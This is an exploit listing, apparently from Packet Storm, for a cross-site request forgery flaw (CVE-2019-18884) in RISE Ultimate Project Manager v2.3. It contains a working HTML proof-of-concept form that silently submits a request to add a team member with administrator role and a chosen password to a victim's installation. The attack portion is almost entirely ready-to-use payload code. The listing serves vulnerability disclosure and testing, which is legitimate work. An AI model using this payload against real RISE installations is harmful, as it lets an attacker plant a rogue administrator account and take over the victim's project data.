RISE Ultimate Project Manager version 2.3 suffers from a cross site request forgery vulnerability.
8e60bec4fb2623528699d757707e00f4621033ec0529346aa20c8fd17f4b7140# Exploit Title: RISE - Ultimate Project Manager v2.3 - Cross-Site Request Forgery (Add Admin)
# Date: 11-11-2019
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: http://fairsketch.com/
# Software Link : https://codecanyon.net/item/rise-ultimate-project-manager/15455641
# Software : RISE - Ultimate Project Manager
# Product Version: Version 2.3
# Vulernability Type : Cross-Site Request Forgery
# Vulenrability : Cross-Site Request Forgery (Add Admin)
# CVE : CVE-2019-18884
# index.php/team_members/add_team_member in RISE Ultimate Project Manager v2.3 has CSRF for adding authorized users.
# CSRF PoC :
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://rise.fairsketch.com/index.php/team_members/add_team_member" method="POST">
<input type="hidden" name="first_name" value="Ismail" />
<input type="hidden" name="last_name" value="Tasdelen" />
<input type="hidden" name="address" value="ismailtasdelen@protonmail.com" />
<input type="hidden" name="phone" value="+12345678975" />
<input type="hidden" name="gender" value="male" />
<input type="hidden" name="job_title" value="Security Researcher" />
<input type="hidden" name="salary" value="100000" />
<input type="hidden" name="salary_term" value="12" />
<input type="hidden" name="date_of_hire" value="2019-11-11" />
<input type="hidden" name="email" value="ismailtasdelen@protonmail.com" />
<input type="hidden" name="password" value="iQ.grF10" />
<input type="hidden" name="role" value="1" />
<input type="hidden" name="email_login_details" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed